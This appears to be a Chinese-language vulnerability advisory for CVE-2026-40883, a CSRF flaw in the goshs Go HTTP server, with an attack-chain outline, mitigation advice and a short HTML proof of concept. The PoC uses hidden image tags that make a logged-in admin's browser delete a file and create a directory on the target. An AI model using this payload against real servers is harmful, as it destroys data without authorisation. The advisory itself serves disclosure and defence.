CVE-2026-40883 CVSS 8.1 高危

CVE-2026-40883 goshs跨站请求伪造漏洞

披露日期: 2026-04-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40883

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

goshs

漏洞概述

goshs是一款用Go语言编写的简易HTTP服务器。在2.0.0-beta.4至2.0.0-beta.5版本中，系统存在严重的跨站请求伪造（CSRF）安全漏洞。由于该软件在处理涉及状态变更的HTTP GET请求（如文件删除、目录创建）时，仅依赖HTTP基础认证，且未实施CSRF令牌或来源验证机制，攻击者可诱导已登录用户访问恶意链接。一旦用户触发，服务器将执行破坏性指令，导致数据丢失或完整性受损。该问题已在2.0.0-beta.6版本中修复。

技术细节

该漏洞的核心成因在于goshs未能对敏感的状态改变操作实施充分的请求来源验证。尽管应用使用了HTTP Basic Auth来限制访问权限，但浏览器会自动对同一域名的请求附带Authorization头。攻击者利用这一特性，通过构建恶意HTML页面（如包含<img>标签或隐藏的iframe），将带有敏感参数（如?delete=path或?mkdir=path）的GET请求指向受害者的goshs服务器。当已认证的管理员无意间访问攻击者构造的页面时，浏览器将在后台自动发送这些请求。goshs服务端接收到请求后，验证Basic Auth凭证有效，但由于缺乏对Referer头或CSRF Token的检查，误以为是合法的管理员操作，进而执行文件系统操作。这种利用方式无需用户交互即可在后台触发（仅需加载页面），严重威胁服务器的数据完整性和可用性。

攻击链分析

STEP 1

1. 钓鱼诱骗

攻击者构建包含恶意链接的网页或HTML邮件，链接指向目标goshs服务器的敏感接口（如?delete）。

STEP 2

2. 诱导访问

攻击者诱导已登录goshs服务器的受害者访问该恶意网页。

STEP 3

3. 自动触发

受害者浏览器加载页面时，自动向goshs服务器发送附带Basic Auth凭证的GET请求。

STEP 4

4. 执行操作

goshs服务器验证凭证成功，因缺少CSRF防护，错误地执行删除或创建目录的操作。

STEP 5

5. 攻击完成

服务器文件被篡改或删除，造成完整性破坏或服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Exploit Code: PoC for CVE-2026-40883 -->
<!-- Save as exploit.html and host it. Wait for an authenticated admin to visit. -->
<html>
<body>
<h1>Loading...</h1>
<!-- Request to delete a file -->
<img src="http://target-server:port/?delete=/path/to/sensitive/file.txt" style="display:none;" />
<!-- Request to create a directory -->
<img src="http://target-server:port/?mkdir=/hacked_by_attacker" style="display:none;" />
</body>
</html>

影响范围

goshs 2.0.0-beta.4

goshs 2.0.0-beta.5

防御指南

临时缓解措施

如果无法立即升级，建议将goshs服务部署在内网并限制访问IP，同时提醒管理员在使用服务时不要同时访问其他不可信网站，以降低被CSRF攻击的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表